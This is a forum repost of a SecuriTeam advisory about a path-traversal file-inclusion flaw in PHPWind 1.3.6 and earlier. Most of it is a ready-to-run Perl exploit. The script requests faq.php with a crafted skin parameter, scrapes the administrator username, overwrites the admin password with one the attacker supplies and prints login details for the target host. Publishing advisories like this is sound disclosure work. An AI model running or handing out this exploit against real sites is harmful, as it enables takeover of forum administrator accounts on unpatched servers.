[转载]PHPWind Skin Vulnerability
信息来源:[url]www.securiteam.com[/url]The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: [url]http://www.securiteam.com[/url]
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
[url]http://www.securiteam.com/mailinglist.html[/url]
- - - - - - - - -
PHPWind Skin Vulnerability (Exploit)
------------------------------------------------------------------------
SUMMARY
Due to a vulnerability in the way PHPWind handles user provided input, a
remote attacker can cause PHPWind to include an external file (in our case
the admin.php file). Once this external file has been included a remote
attacker can retrieve the administrative password of the PHPWind program.
DETAILS
Vulnerable Systems:
* PHPWind version 1.3.6 and prior
Immune Systems:
* PHPWind version 2.0.2 or newer
Exploit:
[code]#!/usr/bin/perl
#Phpwind 1.3.6 skin exploit
#Code by Alpha([email]netsh@163.com[/email])
#Welcom To [url]Http://www.cnwill.com/[/url]
#You can find the Message about this bug @
#[url]http://www.54hack.info/txt/phpwind.doc[/url]
use IO::Socket;
system('cls');
if (@ARGV != 4) {
print "\n";
print "*****************************************************\n";
print "Thanks use this programme\n";
print "This is Phpwind 1.3.6 admin password exploit.\n\n";
print "Usage: \n $0 host port path adminpass \n\n";
print "e.g :\n $0 www.*.com 80 /bbs/ alpha\n";
print" $0 bbs.*.com 80 / alpha\n\n";
print "Code by Alpha,Welcome to [url]WWW.CNWILL.COM!![/url]\n";
print "*****************************************************\n";
exit(1);
}
$host = @ARGV[0];
$port = @ARGV[1];
$path = @ARGV[2];
$adminpass = @ARGV[3];
print "###### CODE BY Alpha,Welcome to [url]WWW.CNWILL.COM[/url] ######\n\n";
$req = "GET $path"."faq.php?skin=../../admin/manager&tplpath=admin
HTTP/1.1\n".
"Host: $host\n".
"Accept-Language: fr\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n".
"Connection: close\n\n";
#print "$req1";
#exit;
print "###### Waitting,WE are getting the adminname...........\n\n";
@res = &connect;
#print @res;
$aaa =join ('',@res);
$po = index ($aaa, "name=username");
#print "$po\n";
$bbb=substr ($aaa,$po+28, $po+50);
@array = split("><",$bbb);
$adminname=@array[0];
print "###### Oh,WE got the adminname and it is $adminname\n\n";
print "###### Waitting,WE are charging the adminpassword as
$adminpass................\n\n";
$req = "GET
$path"."faq.php?skin=../../admin/manager&username=$adminname&password=$adminpass&check_pwd=$adminpass&action=go HTTP/1.1\n".
"Host: $host\n".
"Accept-Language: fr\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n".
"Connection: close\n\n";
@res1 = &connect;
print "###### OK ,Now you can login as adminuser:$adminname and
password:$adminpass @ \n\n###### $host$path"."admin.php \n\n###### GOOD
LUCK,Welcome to [url]WWW.CNWILL.COM!![/url]\n";
sub connect{
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not
connect to $host \n";
print $connection $req;
my @res = <$connection>;
close $connection;
return @res;
}[/code]
ADDITIONAL INFORMATION
The information has been provided by <mailto:netsh@163.com.> Alpha.
The original article can be found at:
<[url]http://www.54hack.info/txt/phpwind.doc>;[/url]
[url]http://www.54hack.info/txt/phpwind.doc[/url]
页:
[1]